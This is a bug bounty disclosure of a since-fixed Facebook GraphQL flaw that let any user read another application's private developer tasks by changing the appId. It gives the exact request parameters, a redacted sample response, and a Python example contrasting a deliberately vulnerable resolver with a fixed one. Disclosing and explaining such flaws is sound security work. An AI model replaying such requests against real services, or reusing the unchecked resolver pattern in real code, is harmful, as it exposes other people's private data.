Access developer tasks list of any Facebook Application (Bug Bounty)

This vulnerability could have let a malicious user access the developer tasks list of any Facebook Application. Developer tasks are private information that should be accessible only to the authorized developers of the concerned Facebook application.


While browsing https://developers.facebook.com/apps/ I noticed a GraphQL request that was returning the tasks list of my Facebook application.

By intercepting the request and changing the appId value to the ID of a third-party Facebook Application, I was able to access the tasks list of the targeted app.

Reproduction Steps

1) Send a POST request to https://www.facebook.com/api/graphql/ with required CSRF parameters and the following parameters in the request body:

&variables={"appId":"X"}&doc_id=265437575802287

where X is the appId of the targeted application.

The GraphQL response will return the developer tasks list of the targeted Facebook application:

{
  "data": {
    "app_tasks": [
      {
        "id": "REDACTED",
        "app_id": "X",
        "app_name": "REDACTED",
        "task_objective": "REDACTED",
        "deadline": 1606147652,
        "completion_time": 1605495171
      }
    ],
    "user_tasks_open_count": 0
  },
  "extensions": {
    "is_final": true
  }
}
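The root cause is an object-level authorization check that is missing from the resolver behind this query: the server trusts the client-supplied appId. As an added illustration (not Facebook's code; the data model, role table and resolver names are assumptions made for this example), here is a minimal resolver pair: the first returns tasks for whatever appId the caller names, the second verifies that the viewer is a registered developer of that app before any data is looked up.

```python
# Added illustration of the missing object-level authorization check.
# Not Facebook's code: the data model, the resolver signatures and the
# developer-role table are assumptions made for this example.
from dataclasses import asdict, dataclass


@dataclass(frozen=True)
class Task:
    id: str
    app_id: str
    app_name: str
    task_objective: str
    deadline: int
    completion_time: int


# Constructed sample data: two apps, each with its own developers and tasks.
APP_DEVELOPERS = {"1001": {"alice"}, "2002": {"bob"}}
APP_TASKS = {
    "1001": [Task("t1", "1001", "Alice App", "Submit for review", 1606147652, 1605495171)],
    "2002": [Task("t2", "2002", "Bob App", "Complete data checkup", 1606147652, 0)],
}


class AuthorizationError(Exception):
    pass


def app_tasks_vulnerable(viewer: str, app_id: str) -> list[Task]:
    # Only checks that *someone* is logged in; any viewer gets any app's tasks.
    return list(APP_TASKS.get(app_id, []))


def app_tasks_fixed(viewer: str, app_id: str) -> list[Task]:
    # Object-level check: authorize the (viewer, app_id) pair before touching data.
    # An unknown app and an unauthorized viewer get the same error, so the
    # response does not reveal whether the app exists.
    if viewer not in APP_DEVELOPERS.get(app_id, set()):
        raise AuthorizationError("viewer is not a developer of this app")
    return list(APP_TASKS[app_id])


def serialize(tasks: list[Task]) -> dict:
    # Response shape mirrors the body shown in the write-up; treating a zero
    # completion_time as "still open" is an assumption for this example.
    return {
        "data": {
            "app_tasks": [asdict(t) for t in tasks],
            "user_tasks_open_count": sum(1 for t in tasks if t.completion_time == 0),
        },
        "extensions": {"is_final": True},
    }
```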

Timeline

January 6, 2021: Report Sent
January 8, 2021: Acknowledged by Facebook
January 13, 2021: Fixed by Facebook
February 1, 2021: Bounty awarded by Facebook

Twitter: https://twitter.com/amineaboud

Entrepreneur & cyber security enthusiast doing bug bounty for fun.
